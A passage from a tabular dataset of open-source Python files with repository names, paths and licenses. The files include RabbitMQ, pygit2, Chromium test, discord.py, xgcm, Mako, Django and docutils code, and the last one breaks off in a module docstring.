repo_name stringlengths 5 100 | path stringlengths 4 375 | copies stringclasses 991 values | size stringlengths 4 7 | content stringlengths 666 1M | license stringclasses 15 values |
|---|---|---|---|---|---|
bkolowitz/IADSS | ml/receive_logs_direct.py | 2 | 1050 | __author__ = 'parallels'
import logging
logging.basicConfig(format='%(levelname)s:%(message)s', level=logging.CRITICAL)
import pika
import sys
connection = pika.BlockingConnection(pika.ConnectionParameters(
host='localhost'))
channel = connection.channel()
channel.exchange_declare(exchange='direct_logs',
type='direct')
result = channel.queue_declare(exclusive=True)
queue_name = result.method.queue
severities = sys.argv[1:]
if not severities:
print >> sys.stderr, "Usage: %s [info] [warning] [error]" % \
(sys.argv[0],)
sys.exit(1)
for severity in severities:
channel.queue_bind(exchange='direct_logs',
queue=queue_name,
routing_key=severity)
print ' [*] Waiting for logs. To exit press CTRL+C'
def callback(ch, method, properties, body):
print " [x] %r:%r" % (method.routing_key, body,)
channel.basic_consume(callback,
queue=queue_name,
no_ack=True)
channel.start_consuming() | apache-2.0 |
uwcirg/true_nth_usa_portal | portal/models/qbd.py | 1 | 2760 | """QBD (Questionnaire Bank Details) Module"""
from ..date_tools import FHIR_datetime
class QBD(object):
"""Details needed to define a QB"""
def __init__(
self, relative_start, iteration, recur=None, recur_id=None,
questionnaire_bank=None, qb_id=None):
"""Hold details needed to uniquely define a QB visit
For db objects ``questionnaire_bank`` and ``recur``, provide either
the id or object version of each, not both. If the other is requsted,
it'll be looked up and cached.
:param relative_start: UTC datetime value marking start point for QBD
:param iteration: None w/o a recurrence, otherwise a zero indexed int
:param recur: If the qb has one or more recurrences, set to the correct
recurrence, or alternatively pass a ``recur_id`` value.
:param recur_id: foreign key value for recur, if object not at hand
:param questionnaire_bank: The QB for the QBD, or alternatively pass
a ``qb_id`` value.
:param qb_id: foreign key value for the questionnaire_bank
"""
if recur and recur_id:
raise ValueError("expect *either* recur itself or id, not both")
if questionnaire_bank and qb_id:
raise ValueError("expect *either* QB itself or id, not both")
self.relative_start = relative_start
self.iteration = iteration
self._recur = recur
self.recur_id = recur.id if recur else recur_id
self._questionnaire_bank = questionnaire_bank
self.qb_id = questionnaire_bank.id if questionnaire_bank else qb_id
@property
def recur(self):
from .recur import Recur
if not self._recur and self.recur_id is not None:
self._recur = Recur.query.get(self.recur_id)
return self._recur
@property
def questionnaire_bank(self):
from .questionnaire_bank import QuestionnaireBank
if not self._questionnaire_bank and self.qb_id is not None:
self._questionnaire_bank = QuestionnaireBank.query.get(self.qb_id)
return self._questionnaire_bank
@questionnaire_bank.setter
def questionnaire_bank(self, qb):
self.qb_id = qb.id
self._questionnaire_bank = qb
def as_json(self):
from ..models.questionnaire_bank import visit_name
results = {}
results['questionnaire_bank'] = (
self.questionnaire_bank.as_json()
if self.questionnaire_bank else None)
results['relative_start'] = (
FHIR_datetime.as_fhir(self.relative_start)
if self.relative_start else None)
results['iteration'] = self.iteration
results['visit'] = visit_name(self)
return results
| bsd-3-clause |
piquadrat/mygit2 | pygit2/_build.py | 2 | 2071 | # -*- coding: utf-8 -*-
#
# Copyright 2010-2015 The pygit2 contributors
#
# This file is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License, version 2,
# as published by the Free Software Foundation.
#
# In addition to the permissions in the GNU General Public License,
# the authors give you unlimited permission to link the compiled
# version of this file into combinations with other programs,
# and to distribute those combinations without any restriction
# coming from the use of this file. (The General Public License
# restrictions do apply in other respects; for example, they cover
# modification of the file, and distribution when not linked into
# a combined executable.)
#
# This file is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; see the file COPYING. If not, write to
# the Free Software Foundation, 51 Franklin Street, Fifth Floor,
# Boston, MA 02110-1301, USA.
"""
This is an special module, it provides stuff used by setup.py at build time.
But also used by pygit2 at run time.
"""
# Import from the Standard Library
import os
from os import getenv
#
# The version number of pygit2
#
__version__ = '0.24.0'
#
# Utility functions to get the paths required for bulding extensions
#
def _get_libgit2_path():
# LIBGIT2 environment variable takes precedence
libgit2_path = getenv("LIBGIT2")
if libgit2_path is not None:
return libgit2_path
# Default
if os.name == 'nt':
return '%s\libgit2' % getenv("ProgramFiles")
return '/usr/local'
def get_libgit2_paths():
libgit2_path = _get_libgit2_path()
return (
os.path.join(libgit2_path, 'bin'),
os.path.join(libgit2_path, 'include'),
getenv('LIBGIT2_LIB', os.path.join(libgit2_path, 'lib')),
)
| gpl-2.0 |
jaruba/chromium.src | build/android/pylib/utils/json_results_generator_unittest.py | 87 | 7184 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
#
# Most of this file was ported over from Blink's
# webkitpy/layout_tests/layout_package/json_results_generator_unittest.py
#
import unittest
import json
from pylib.utils import json_results_generator
class JSONGeneratorTest(unittest.TestCase):
def setUp(self):
self.builder_name = 'DUMMY_BUILDER_NAME'
self.build_name = 'DUMMY_BUILD_NAME'
self.build_number = 'DUMMY_BUILDER_NUMBER'
# For archived results.
self._json = None
self._num_runs = 0
self._tests_set = set([])
self._test_timings = {}
self._failed_count_map = {}
self._PASS_count = 0
self._DISABLED_count = 0
self._FLAKY_count = 0
self._FAILS_count = 0
self._fixable_count = 0
self._orig_write_json = json_results_generator.WriteJSON
# unused arguments ... pylint: disable=W0613
def _WriteJSONStub(json_object, file_path, callback=None):
pass
json_results_generator.WriteJSON = _WriteJSONStub
def tearDown(self):
json_results_generator.WriteJSON = self._orig_write_json
def _TestJSONGeneration(self, passed_tests_list, failed_tests_list):
tests_set = set(passed_tests_list) | set(failed_tests_list)
DISABLED_tests = set([t for t in tests_set
if t.startswith('DISABLED_')])
FLAKY_tests = set([t for t in tests_set
if t.startswith('FLAKY_')])
FAILS_tests = set([t for t in tests_set
if t.startswith('FAILS_')])
PASS_tests = tests_set - (DISABLED_tests | FLAKY_tests | FAILS_tests)
failed_tests = set(failed_tests_list) - DISABLED_tests
failed_count_map = dict([(t, 1) for t in failed_tests])
test_timings = {}
i = 0
for test in tests_set:
test_timings[test] = float(self._num_runs * 100 + i)
i += 1
test_results_map = dict()
for test in tests_set:
test_results_map[test] = json_results_generator.TestResult(
test, failed=(test in failed_tests),
elapsed_time=test_timings[test])
generator = json_results_generator.JSONResultsGeneratorBase(
self.builder_name, self.build_name, self.build_number,
'',
None, # don't fetch past json results archive
test_results_map)
failed_count_map = dict([(t, 1) for t in failed_tests])
# Test incremental json results
incremental_json = generator.GetJSON()
self._VerifyJSONResults(
tests_set,
test_timings,
failed_count_map,
len(PASS_tests),
len(DISABLED_tests),
len(FLAKY_tests),
len(DISABLED_tests | failed_tests),
incremental_json,
1)
# We don't verify the results here, but at least we make sure the code
# runs without errors.
generator.GenerateJSONOutput()
generator.GenerateTimesMSFile()
def _VerifyJSONResults(self, tests_set, test_timings, failed_count_map,
PASS_count, DISABLED_count, FLAKY_count,
fixable_count, json_obj, num_runs):
# Aliasing to a short name for better access to its constants.
JRG = json_results_generator.JSONResultsGeneratorBase
self.assertIn(JRG.VERSION_KEY, json_obj)
self.assertIn(self.builder_name, json_obj)
buildinfo = json_obj[self.builder_name]
self.assertIn(JRG.FIXABLE, buildinfo)
self.assertIn(JRG.TESTS, buildinfo)
self.assertEqual(len(buildinfo[JRG.BUILD_NUMBERS]), num_runs)
self.assertEqual(buildinfo[JRG.BUILD_NUMBERS][0], self.build_number)
if tests_set or DISABLED_count:
fixable = {}
for fixable_items in buildinfo[JRG.FIXABLE]:
for (result_type, count) in fixable_items.iteritems():
if result_type in fixable:
fixable[result_type] = fixable[result_type] + count
else:
fixable[result_type] = count
if PASS_count:
self.assertEqual(fixable[JRG.PASS_RESULT], PASS_count)
else:
self.assertTrue(JRG.PASS_RESULT not in fixable or
fixable[JRG.PASS_RESULT] == 0)
if DISABLED_count:
self.assertEqual(fixable[JRG.SKIP_RESULT], DISABLED_count)
else:
self.assertTrue(JRG.SKIP_RESULT not in fixable or
fixable[JRG.SKIP_RESULT] == 0)
if FLAKY_count:
self.assertEqual(fixable[JRG.FLAKY_RESULT], FLAKY_count)
else:
self.assertTrue(JRG.FLAKY_RESULT not in fixable or
fixable[JRG.FLAKY_RESULT] == 0)
if failed_count_map:
tests = buildinfo[JRG.TESTS]
for test_name in failed_count_map.iterkeys():
test = self._FindTestInTrie(test_name, tests)
failed = 0
for result in test[JRG.RESULTS]:
if result[1] == JRG.FAIL_RESULT:
failed += result[0]
self.assertEqual(failed_count_map[test_name], failed)
timing_count = 0
for timings in test[JRG.TIMES]:
if timings[1] == test_timings[test_name]:
timing_count = timings[0]
self.assertEqual(1, timing_count)
if fixable_count:
self.assertEqual(sum(buildinfo[JRG.FIXABLE_COUNT]), fixable_count)
def _FindTestInTrie(self, path, trie):
nodes = path.split('/')
sub_trie = trie
for node in nodes:
self.assertIn(node, sub_trie)
sub_trie = sub_trie[node]
return sub_trie
def testJSONGeneration(self):
self._TestJSONGeneration([], [])
self._TestJSONGeneration(['A1', 'B1'], [])
self._TestJSONGeneration([], ['FAILS_A2', 'FAILS_B2'])
self._TestJSONGeneration(['DISABLED_A3', 'DISABLED_B3'], [])
self._TestJSONGeneration(['A4'], ['B4', 'FAILS_C4'])
self._TestJSONGeneration(['DISABLED_C5', 'DISABLED_D5'], ['A5', 'B5'])
self._TestJSONGeneration(
['A6', 'B6', 'FAILS_C6', 'DISABLED_E6', 'DISABLED_F6'],
['FAILS_D6'])
# Generate JSON with the same test sets. (Both incremental results and
# archived results must be updated appropriately.)
self._TestJSONGeneration(
['A', 'FLAKY_B', 'DISABLED_C'],
['FAILS_D', 'FLAKY_E'])
self._TestJSONGeneration(
['A', 'DISABLED_C', 'FLAKY_E'],
['FLAKY_B', 'FAILS_D'])
self._TestJSONGeneration(
['FLAKY_B', 'DISABLED_C', 'FAILS_D'],
['A', 'FLAKY_E'])
def testHierarchicalJSNGeneration(self):
# FIXME: Re-work tests to be more comprehensible and comprehensive.
self._TestJSONGeneration(['foo/A'], ['foo/B', 'bar/C'])
def testTestTimingsTrie(self):
individual_test_timings = []
individual_test_timings.append(
json_results_generator.TestResult(
'foo/bar/baz.html',
elapsed_time=1.2))
individual_test_timings.append(
json_results_generator.TestResult('bar.html', elapsed_time=0.0001))
trie = json_results_generator.TestTimingsTrie(individual_test_timings)
expected_trie = {
'bar.html': 0,
'foo': {
'bar': {
'baz.html': 1200,
}
}
}
self.assertEqual(json.dumps(trie), json.dumps(expected_trie))
| bsd-3-clause |
Aurous/Magic-Discord-Bot | discord/ext/commands/converter.py | 1 | 5485 | # -*- coding: utf-8 -*-
"""
The MIT License (MIT)
Copyright (c) 2015-2016 Rapptz
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
import discord
import asyncio
import re
from .errors import BadArgument, NoPrivateMessage
__all__ = [ 'Converter', 'MemberConverter', 'UserConverter',
'ChannelConverter', 'InviteConverter', 'RoleConverter',
'GameConverter', 'ColourConverter' ]
def _get_from_servers(bot, getter, argument):
result = None
for server in bot.servers:
result = getattr(server, getter)(argument)
if result:
return result
return result
class Converter:
"""The base class of custom converters that require the :class:`Context`
to be passed to be useful.
This allows you to implement converters that function similar to the
special cased ``discord`` classes.
Classes that derive from this should override the :meth:`convert` method
to do its conversion logic. This method could be a coroutine or a regular
function.
Attributes
-----------
ctx: :class:`Context`
The invocation context that the argument is being used in.
argument: str
The argument that is being converted.
"""
def __init__(self, ctx, argument):
self.ctx = ctx
self.argument = argument
def convert(self):
raise NotImplementedError('Derived classes need to implement this.')
class MemberConverter(Converter):
def convert(self):
message = self.ctx.message
bot = self.ctx.bot
match = re.match(r'<@!?([0-9]+)>$', self.argument)
server = message.server
result = None
if match is None:
# not a mention...
if server:
result = server.get_member_named(self.argument)
else:
result = _get_from_servers(bot, 'get_member_named', self.argument)
else:
user_id = match.group(1)
if server:
result = server.get_member(user_id)
else:
result = _get_from_servers(bot, 'get_member', user_id)
if result is None:
raise BadArgument('Member "{}" not found'.format(self.argument))
return result
UserConverter = MemberConverter
class ChannelConverter(Converter):
def convert(self):
message = self.ctx.message
bot = self.ctx.bot
match = re.match(r'<#([0-9]+)>$', self.argument)
result = None
server = message.server
if match is None:
# not a mention
if server:
result = discord.utils.get(server.channels, name=self.argument)
else:
result = discord.utils.get(bot.get_all_channels(), name=self.argument)
else:
channel_id = match.group(1)
if server:
result = server.get_channel(channel_id)
else:
result = _get_from_servers(bot, 'get_channel', channel_id)
if result is None:
raise BadArgument('Channel "{}" not found.'.format(self.argument))
return result
class ColourConverter(Converter):
def convert(self):
arg = self.argument.replace('0x', '').lower()
if arg[0] == '#':
arg = arg[1:]
try:
value = int(arg, base=16)
return discord.Colour(value=value)
except ValueError:
method = getattr(discord.Colour, arg, None)
if method is None or not inspect.ismethod(method):
raise BadArgument('Colour "{}" is invalid.'.format(arg))
return method()
class RoleConverter(Converter):
def convert(self):
server = self.ctx.message.server
if not server:
raise NoPrivateMessage()
match = re.match(r'<@&([0-9]+)>$', self.argument)
params = dict(id=match.group(1)) if match else dict(name=self.argument)
result = discord.utils.get(server.roles, **params)
if result is None:
raise BadArgument('Role "{}" not found.'.format(self.argument))
return result
class GameConverter(Converter):
def convert(self):
return discord.Game(name=self.argument)
class InviteConverter(Converter):
@asyncio.coroutine
def convert(self):
try:
invite = yield from self.ctx.bot.get_invite(self.argument)
return invite
except Exception as e:
raise BadArgument('Invite is invalid or expired') from e
| gpl-3.0 |
gregmuellegger/django-superform | setup.py | 1 | 1935 | # -*- coding: utf-8 -*-
import codecs
import re
from os import path
from distutils.core import setup
from setuptools import find_packages
def read(*parts):
return codecs.open(path.join(path.dirname(__file__), *parts),
encoding='utf-8').read()
def find_version(*file_paths):
version_file = read(*file_paths)
version_match = re.search(r"^__version__ = ['\"]([^'\"]*)['\"]",
version_file, re.M)
if version_match:
return version_match.group(1)
raise RuntimeError("Unable to find version string.")
setup(
name='django-superform',
version=find_version('django_superform', '__init__.py'),
author=u'Gregor Müllegger',
author_email='gregor@muellegger.de',
packages=find_packages(),
include_package_data=True,
url='https://github.com/gregmuellegger/django-superform',
license='BSD licence, see LICENSE file',
description='So much easier handling of formsets.',
long_description=u'\n\n'.join((
read('README.rst'),
read('CHANGES.rst'))),
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Web Environment',
'Framework :: Django',
'Framework :: Django :: 1.4',
'Framework :: Django :: 1.6',
'Framework :: Django :: 1.7',
'Framework :: Django :: 1.8',
'Framework :: Django :: 1.9',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Natural Language :: English',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
],
zip_safe=False,
)
| bsd-3-clause |
xgcm/xgcm | xgcm/duck_array_ops.py | 1 | 5381 | """Compatibility module defining operations on duck numpy-arrays.
Shamelessly copied from xarray."""
import numpy as np
try:
import dask.array as dsa
has_dask = True
except ImportError:
has_dask = False
def _dask_or_eager_func(name, eager_module=np, list_of_args=False, n_array_args=1):
"""Create a function that dispatches to dask for dask array inputs."""
if has_dask:
def f(*args, **kwargs):
dispatch_args = args[0] if list_of_args else args
if any(isinstance(a, dsa.Array) for a in dispatch_args[:n_array_args]):
module = dsa
else:
module = eager_module
return getattr(module, name)(*args, **kwargs)
else:
def f(data, *args, **kwargs):
return getattr(eager_module, name)(data, *args, **kwargs)
return f
insert = _dask_or_eager_func("insert")
take = _dask_or_eager_func("take")
concatenate = _dask_or_eager_func("concatenate", list_of_args=True)
def _apply_boundary_condition(da, dim, left, boundary=None, fill_value=0.0):
"""Supply boundary conditions for an xarray.DataArray da according along
the specified dimension. Returns a raw dask or numpy array, depending on
the underlying data.
Parameters
----------
da : xarray.DataArray
The data on which to operate
dim : str
Dimenson on which to act
left : bool
If `True`, boundary condition is at left (beginning of array).
If `False`, boundary condition is at the right (end of the array).
boundary : {'fill', 'extend', 'extrapolate'}
A flag indicating how the boundary values are determined.
* 'fill': All values outside the array set to fill_value
(i.e. a Dirichlet boundary condition.)
* 'extend': Set values outside the array to the nearest array
value. (i.e. a limited form of Neumann boundary condition.)
* 'extrapolate': Set values by extrapolating linearly from the two
points nearest to the edge
fill_value : float, optional
The value to use in the boundary condition with `boundary='fill'`.
"""
if boundary not in ["fill", "extend", "extrapolate"]:
raise ValueError(
"`boundary` must be 'fill', 'extend' or "
"'extrapolate', not %r." % boundary
)
axis_num = da.get_axis_num(dim)
# the shape for the edge array
shape = list(da.shape)
shape[axis_num] = 1
base_array = da.data
index = slice(0, 1) if left else slice(-1, None)
edge_array = da.isel(**{dim: index}).data
use_dask = has_dask and isinstance(base_array, dsa.Array)
if boundary == "extend":
boundary_array = edge_array
elif boundary == "fill":
args = shape, fill_value
kwargs = {"dtype": base_array.dtype}
if use_dask:
full_func = dsa.full
kwargs["chunks"] = edge_array.chunks
else:
full_func = np.full
boundary_array = full_func(*args, **kwargs)
elif boundary == "extrapolate":
gradient_slice = slice(0, 2) if left else slice(-2, None)
gradient_sign = -1 if left else 1
linear_gradient = da.isel(**{dim: gradient_slice}).diff(dim=dim).data
boundary_array = edge_array + gradient_sign * linear_gradient
return boundary_array
def _pad_array(da, dim, left=False, boundary=None, fill_value=0.0):
"""
Pad an xarray.DataArray da according to the boundary conditions along dim.
Return a raw dask or numpy array, depending on the underlying data.
Parameters
----------
da : xarray.DataArray
The data on which to operate
dim : str
Dimenson to pad
left : bool
If `False`, data is padded at the right (end of the array). If `True`,
padded at left (beginning of array).
boundary : {'fill', 'extend'}
A flag indicating how to handle boundaries:
* None: Do not apply any boundary conditions. Raise an error if
boundary conditions are required for the operation.
* 'fill': Set values outside the array boundary to fill_value
(i.e. a Dirichlet boundary condition.)
* 'extend': Set values outside the array to the nearest array
value. (i.e. a limited form of Neumann boundary condition.)
fill_value : float, optional
The value to use in the boundary condition with `boundary='fill'`.
"""
if boundary not in ["fill", "extend"]:
raise ValueError("`boundary` must be `'fill'` or `'extend'`")
axis_num = da.get_axis_num(dim)
shape = list(da.shape)
shape[axis_num] = 1
base_array = da.data
index = slice(0, 1) if left else slice(-1, None)
edge_array = da.isel(**{dim: index}).data
use_dask = has_dask and isinstance(base_array, dsa.Array)
if boundary == "extend":
boundary_array = edge_array
elif boundary == "fill":
args = shape, fill_value
kwargs = {"dtype": base_array.dtype}
if use_dask:
full_func = dsa.full
kwargs["chunks"] = edge_array.chunks
else:
full_func = np.full
boundary_array = full_func(*args, **kwargs)
arrays_to_concat = [base_array, boundary_array]
if left:
arrays_to_concat.reverse()
return concatenate(arrays_to_concat, axis=axis_num)
| mit |
agiliq/django-graphos | demo_project/static/admin/js/compress.py | 784 | 1896 | #!/usr/bin/env python
import os
import optparse
import subprocess
import sys
here = os.path.dirname(__file__)
def main():
usage = "usage: %prog [file1..fileN]"
description = """With no file paths given this script will automatically
compress all jQuery-based files of the admin app. Requires the Google Closure
Compiler library and Java version 6 or later."""
parser = optparse.OptionParser(usage, description=description)
parser.add_option("-c", dest="compiler", default="~/bin/compiler.jar",
help="path to Closure Compiler jar file")
parser.add_option("-v", "--verbose",
action="store_true", dest="verbose")
parser.add_option("-q", "--quiet",
action="store_false", dest="verbose")
(options, args) = parser.parse_args()
compiler = os.path.expanduser(options.compiler)
if not os.path.exists(compiler):
sys.exit("Google Closure compiler jar file %s not found. Please use the -c option to specify the path." % compiler)
if not args:
if options.verbose:
sys.stdout.write("No filenames given; defaulting to admin scripts\n")
args = [os.path.join(here, f) for f in [
"actions.js", "collapse.js", "inlines.js", "prepopulate.js"]]
for arg in args:
if not arg.endswith(".js"):
arg = arg + ".js"
to_compress = os.path.expanduser(arg)
if os.path.exists(to_compress):
to_compress_min = "%s.min.js" % "".join(arg.rsplit(".js"))
cmd = "java -jar %s --js %s --js_output_file %s" % (compiler, to_compress, to_compress_min)
if options.verbose:
sys.stdout.write("Running: %s\n" % cmd)
subprocess.call(cmd.split())
else:
sys.stdout.write("File %s not found. Sure it exists?\n" % to_compress)
if __name__ == '__main__':
main()
| bsd-2-clause |
weisongchen/flaskapp | venv/lib/python2.7/site-packages/mako/ast.py | 61 | 6635 | # mako/ast.py
# Copyright (C) 2006-2016 the Mako authors and contributors <see AUTHORS file>
#
# This module is part of Mako and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""utilities for analyzing expressions and blocks of Python
code, as well as generating Python from AST nodes"""
from mako import exceptions, pyparser, compat
import re
class PythonCode(object):
"""represents information about a string containing Python code"""
def __init__(self, code, **exception_kwargs):
self.code = code
# represents all identifiers which are assigned to at some point in
# the code
self.declared_identifiers = set()
# represents all identifiers which are referenced before their
# assignment, if any
self.undeclared_identifiers = set()
# note that an identifier can be in both the undeclared and declared
# lists.
# using AST to parse instead of using code.co_varnames,
# code.co_names has several advantages:
# - we can locate an identifier as "undeclared" even if
# its declared later in the same block of code
# - AST is less likely to break with version changes
# (for example, the behavior of co_names changed a little bit
# in python version 2.5)
if isinstance(code, compat.string_types):
expr = pyparser.parse(code.lstrip(), "exec", **exception_kwargs)
else:
expr = code
f = pyparser.FindIdentifiers(self, **exception_kwargs)
f.visit(expr)
class ArgumentList(object):
"""parses a fragment of code as a comma-separated list of expressions"""
def __init__(self, code, **exception_kwargs):
self.codeargs = []
self.args = []
self.declared_identifiers = set()
self.undeclared_identifiers = set()
if isinstance(code, compat.string_types):
if re.match(r"\S", code) and not re.match(r",\s*$", code):
# if theres text and no trailing comma, insure its parsed
# as a tuple by adding a trailing comma
code += ","
expr = pyparser.parse(code, "exec", **exception_kwargs)
else:
expr = code
f = pyparser.FindTuple(self, PythonCode, **exception_kwargs)
f.visit(expr)
class PythonFragment(PythonCode):
"""extends PythonCode to provide identifier lookups in partial control
statements
e.g.
for x in 5:
elif y==9:
except (MyException, e):
etc.
"""
def __init__(self, code, **exception_kwargs):
m = re.match(r'^(\w+)(?:\s+(.*?))?:\s*(#|$)', code.strip(), re.S)
if not m:
raise exceptions.CompileException(
"Fragment '%s' is not a partial control statement" %
code, **exception_kwargs)
if m.group(3):
code = code[:m.start(3)]
(keyword, expr) = m.group(1, 2)
if keyword in ['for', 'if', 'while']:
code = code + "pass"
elif keyword == 'try':
code = code + "pass\nexcept:pass"
elif keyword == 'elif' or keyword == 'else':
code = "if False:pass\n" + code + "pass"
elif keyword == 'except':
code = "try:pass\n" + code + "pass"
elif keyword == 'with':
code = code + "pass"
else:
raise exceptions.CompileException(
"Unsupported control keyword: '%s'" %
keyword, **exception_kwargs)
super(PythonFragment, self).__init__(code, **exception_kwargs)
class FunctionDecl(object):
"""function declaration"""
def __init__(self, code, allow_kwargs=True, **exception_kwargs):
self.code = code
expr = pyparser.parse(code, "exec", **exception_kwargs)
f = pyparser.ParseFunc(self, **exception_kwargs)
f.visit(expr)
if not hasattr(self, 'funcname'):
raise exceptions.CompileException(
"Code '%s' is not a function declaration" % code,
**exception_kwargs)
if not allow_kwargs and self.kwargs:
raise exceptions.CompileException(
"'**%s' keyword argument not allowed here" %
self.kwargnames[-1], **exception_kwargs)
def get_argument_expressions(self, as_call=False):
"""Return the argument declarations of this FunctionDecl as a printable
list.
By default the return value is appropriate for writing in a ``def``;
set `as_call` to true to build arguments to be passed to the function
instead (assuming locals with the same names as the arguments exist).
"""
namedecls = []
# Build in reverse order, since defaults and slurpy args come last
argnames = self.argnames[::-1]
kwargnames = self.kwargnames[::-1]
defaults = self.defaults[::-1]
kwdefaults = self.kwdefaults[::-1]
# Named arguments
if self.kwargs:
namedecls.append("**" + kwargnames.pop(0))
for name in kwargnames:
# Keyword-only arguments must always be used by name, so even if
# this is a call, print out `foo=foo`
if as_call:
namedecls.append("%s=%s" % (name, name))
elif kwdefaults:
default = kwdefaults.pop(0)
if default is None:
# The AST always gives kwargs a default, since you can do
# `def foo(*, a=1, b, c=3)`
namedecls.append(name)
else:
namedecls.append("%s=%s" % (
name, pyparser.ExpressionGenerator(default).value()))
else:
namedecls.append(name)
# Positional arguments
if self.varargs:
namedecls.append("*" + argnames.pop(0))
for name in argnames:
if as_call or not defaults:
namedecls.append(name)
else:
default = defaults.pop(0)
namedecls.append("%s=%s" % (
name, pyparser.ExpressionGenerator(default).value()))
namedecls.reverse()
return namedecls
@property
def allargnames(self):
return tuple(self.argnames) + tuple(self.kwargnames)
class FunctionArgs(FunctionDecl):
"""the argument portion of a function declaration"""
def __init__(self, code, **kwargs):
super(FunctionArgs, self).__init__("def ANON(%s):pass" % code,
**kwargs)
| mit |
Linktime/Aike | Aike/wsgi.py | 1 | 1158 | """
WSGI config for Aike project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "Aike.settings")
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
# Apply WSGI middleware here.
# from helloworld.wsgi import HelloWorldApplication
# application = HelloWorldApplication(application)
| apache-2.0 |
agconti/njode | env/lib/python2.7/site-packages/docutils/parsers/rst/languages/ru.py | 128 | 3306 | # -*- coding: utf-8 -*-
# $Id: ru.py 7123 2011-09-12 08:28:31Z milde $
# Author: Roman Suzi <rnd@onego.ru>
# Copyright: This module has been placed in the public domain.
# New language mappings are welcome. Before doing a new translation, please
# read <http://docutils.sf.net/docs/howto/i18n.html>. Two files must be
# translated for each language: one in docutils/languages, the other in
# docutils/parsers/rst/languages.
"""
Russian-language mappings for language-dependent features of
reStructuredText.
"""
__docformat__ = 'reStructuredText'
directives = {
u'блок-строк': u'line-block',
u'meta': u'meta',
u'математика': 'math',
u'обработанный-литерал': u'parsed-literal',
u'выделенная-цитата': u'pull-quote',
u'код': 'code',
u'compound (translation required)': 'compound',
u'контейнер': 'container',
u'таблица': 'table',
u'csv-table (translation required)': 'csv-table',
u'list-table (translation required)': 'list-table',
u'сырой': u'raw',
u'замена': u'replace',
u'тестовая-директива-restructuredtext': u'restructuredtext-test-directive',
u'целевые-сноски': u'target-notes',
u'unicode': u'unicode',
u'дата': u'date',
u'боковая-полоса': u'sidebar',
u'важно': u'important',
u'включать': u'include',
u'внимание': u'attention',
u'выделение': u'highlights',
u'замечание': u'admonition',
u'изображение': u'image',
u'класс': u'class',
u'роль': 'role',
u'default-role (translation required)': 'default-role',
u'титул': 'title',
u'номер-раздела': u'sectnum',
u'нумерация-разделов': u'sectnum',
u'опасно': u'danger',
u'осторожно': u'caution',
u'ошибка': u'error',
u'подсказка': u'tip',
u'предупреждение': u'warning',
u'примечание': u'note',
u'рисунок': u'figure',
u'рубрика': u'rubric',
u'совет': u'hint',
u'содержание': u'contents',
u'тема': u'topic',
u'эпиграф': u'epigraph',
u'header (translation required)': 'header',
u'footer (translation required)': 'footer',}
"""Russian name to registered (in directives/__init__.py) directive name
mapping."""
roles = {
u'акроним': 'acronym',
u'код': 'code',
u'анонимная-ссылка': 'anonymous-reference',
u'буквально': 'literal',
u'математика': 'math',
u'верхний-индекс': 'superscript',
u'выделение': 'emphasis',
u'именованная-ссылка': 'named-reference',
u'индекс': 'index',
u'нижний-индекс': 'subscript',
u'сильное-выделение': 'strong',
u'сокращение': 'abbreviation',
u'ссылка-замена': 'substitution-reference',
u'ссылка-на-pep': 'pep-reference',
u'ссылка-на-rfc': 'rfc-reference',
u'ссылка-на-uri': 'uri-reference',
u'ссылка-на-заглавие': 'title-reference',
u'ссылка-на-сноску': 'footnote-reference',
u'цитатная-ссылка': 'citation-reference',
u'цель': 'target',
u'сырой': 'raw',}
"""Mapping of Russian role names to canonical role names for interpreted text.
"""
| bsd-3-clause |
netgroup/dreamer-ryu | ryu/app/rest_quantum.py | 22 | 4625 | # Copyright (C) 2012 Nippon Telegraph and Telephone Corporation.
# Copyright (C) 2012 Isaku Yamahata <yamahata at private email ne jp>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This module provides a set of REST API dedicated to OpenStack Ryu plug-in.
